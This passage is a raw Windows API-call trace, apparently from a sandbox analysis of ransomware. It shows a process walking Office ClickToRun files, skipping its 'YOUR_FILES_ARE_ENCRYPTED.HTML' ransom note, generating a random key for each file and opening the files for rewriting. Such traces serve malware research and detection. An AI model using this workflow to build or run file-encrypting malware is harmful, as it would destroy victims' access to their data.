returned 0x270000 [0155.931] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0155.932] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" [0155.932] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*" [0155.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96130e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x96130e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0155.933] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96130e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x96130e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0155.933] FindNextFileW (in: hFindFile=0x42f3180, 
lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96130e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x96130e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac2a70f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x44e23, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="AirSpace.Etw.man", cAlternateFileName="AIRSPA~1.MAN")) returned 1 [0155.933] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man") returned 95 [0155.933] lstrcmpW (lpString1="AirSpace.Etw.man", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.933] PathFindExtensionW (pszPath="AirSpace.Etw.man") returned=".man" [0155.934] lstrlenW (lpString=".man") returned 4 [0155.934] PathFindExtensionW (pszPath="AirSpace.Etw.man") returned=".man" [0155.934] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x773afd10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x9786, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", cAlternateFileName="C25A45~1.XML")) returned 1 [0155.934] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml") returned 129 [0155.934] lstrcmpW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
[0155.934] PathFindExtensionW (pszPath="C2RManifest.Access.Access.x-none.msi.16.x-none.xml") returned=".xml" [0155.934] lstrlenW (lpString=".xml") returned 4 [0155.934] PathFindExtensionW (pszPath="C2RManifest.Access.Access.x-none.msi.16.x-none.xml") returned=".xml" [0155.934] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0155.934] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0155.934] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=38790) returned 1 [0155.934] GetProcessHeap () returned 0x270000 [0155.934] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0155.939] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="CF") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="03") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="25") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="AE") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="3B") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="FB") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="C3") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="6E") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="47") returned 2 [0155.939] wsprintfW (in: 
param_1=0x4ebda5a, param_2="%02X" | out: param_1="47") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="FC") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="53") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="85") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="0D") returned 2 [0155.939] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="13") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F8") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="32") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="88") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="0B") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="59") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="E4") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="AF") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="77") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="E1") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="71") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="67") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="DB") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="F6") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="F1") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="FA") returned 2 [0155.940] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="7D") returned 2 
[0155.940] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="49") returned 2 [0155.941] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" [0155.941] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.941] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0155.942] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77b6c490, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0xe048, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.accessmui.msi.16.en-us.xml", cAlternateFileName="C222C2~1.XML")) returned 1 [0155.942] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml") returned 117 [0155.942] lstrcmpW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.942] PathFindExtensionW (pszPath="C2RManifest.accessmui.msi.16.en-us.xml") returned=".xml" [0155.942] lstrlenW (lpString=".xml") returned 4 [0155.944] 
PathFindExtensionW (pszPath="C2RManifest.accessmui.msi.16.en-us.xml") returned=".xml" [0155.944] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0155.944] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0155.945] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=57416) returned 1 [0155.945] GetProcessHeap () returned 0x270000 [0155.945] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0155.956] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="82") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="E4") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C6") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="DE") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="6D") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="48") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="30") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="1C") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="22") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="65") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="4D") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | 
out: param_1="B6") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="93") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="07") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="49") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="03") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="A0") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="98") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="B5") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="CB") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="1B") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="AC") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F3") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="DB") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="23") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="E7") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="8C") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7E") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="BE") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="F1") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="04") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="30") returned 2 [0155.958] lstrcpyW (in: lpString1=0x745a274, 
lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" [0155.958] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.958] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0155.958] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77c04a10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.accessmuiset.msi.16.en-us.xml", cAlternateFileName="C2FB2E~1.XML")) returned 1 [0155.958] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml") returned 120 [0155.958] lstrcmpW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.958] PathFindExtensionW (pszPath="C2RManifest.accessmuiset.msi.16.en-us.xml") returned=".xml" [0155.960] lstrlenW (lpString=".xml") returned 4 [0155.960] PathFindExtensionW (pszPath="C2RManifest.accessmuiset.msi.16.en-us.xml") returned=".xml" [0155.960] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, 
RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0155.960] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0155.968] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=2042) returned 1 [0155.970] GetProcessHeap () returned 0x270000 [0155.970] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0155.972] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="14") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="39") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="1C") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="49") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="74") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="80") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="62") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="AB") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="06") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="6A") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="28") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="AB") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="22") returned 2 [0155.972] 
wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="BC") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="07") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="84") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="8E") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="64") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="B4") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="DF") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="5D") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="1D") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="98") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="DA") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="5F") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="E7") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E3") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="C5") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="EA") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="88") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="44") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="58") returned 2 [0155.974] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" | out: 
lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" [0155.974] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.974] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0155.975] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x773d5e70, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x410e, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", cAlternateFileName="C210C4~1.XML")) returned 1 [0155.976] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml") returned 123 [0155.976] lstrcmpW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.976] PathFindExtensionW (pszPath="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml") returned=".xml" [0155.976] lstrlenW (lpString=".xml") returned 4 [0155.976] PathFindExtensionW (pszPath="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml") returned=".xml" [0155.991] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0155.991] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0155.993] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=16654) returned 1 [0155.993] GetProcessHeap () returned 0x270000 [0155.993] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0155.994] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="54") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="10") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="2A") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="65") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="AA") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="A1") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="DC") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="10") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="AF") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="40") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="03") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="0B") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="8F") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="05") returned 2 
[0155.994] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="43") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C6") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="74") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="E9") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="66") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="BC") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="29") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="61") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="58") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="A5") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="6E") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="C2") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="05") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="05") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="BD") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C6") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E7") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="34") returned 2 [0155.996] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml") 
